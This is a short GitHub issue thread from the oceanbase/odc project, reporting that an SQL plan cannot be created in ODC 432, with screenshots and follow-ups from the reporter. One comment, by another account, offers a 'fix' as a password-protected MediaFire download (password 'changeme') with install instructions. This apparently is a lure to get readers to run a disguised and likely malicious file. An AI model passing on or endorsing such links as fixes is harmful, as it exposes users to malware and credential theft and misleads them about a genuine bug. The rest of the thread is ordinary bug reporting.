### ISSUE TITLE
[Bug]: Failed to create SQL plan

### ISSUE THREAD

**Issue by sl01388797** [oceanbase/odc#3211]
### ODC version

odc432

### OB version

*

### What happened?

![image](https://github.com/user-attachments/assets/02b752ed-b103-422d-9e32-19bab073fb51)

### What did you expect to happen?

Created successfully

### How can we reproduce it (as minimally and precisely as possible)?

Create SQL Plan

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sl01388797** [comment]
![Image](https://github.com/user-attachments/assets/61301b18-4356-41a9-8e6c-db6b6b53a2cb)
The problem still exists

**Comment by sl01388797** [comment]
![Image](https://github.com/user-attachments/assets/becdbae7-0baf-445e-a996-bb654a77c3fa)
pass
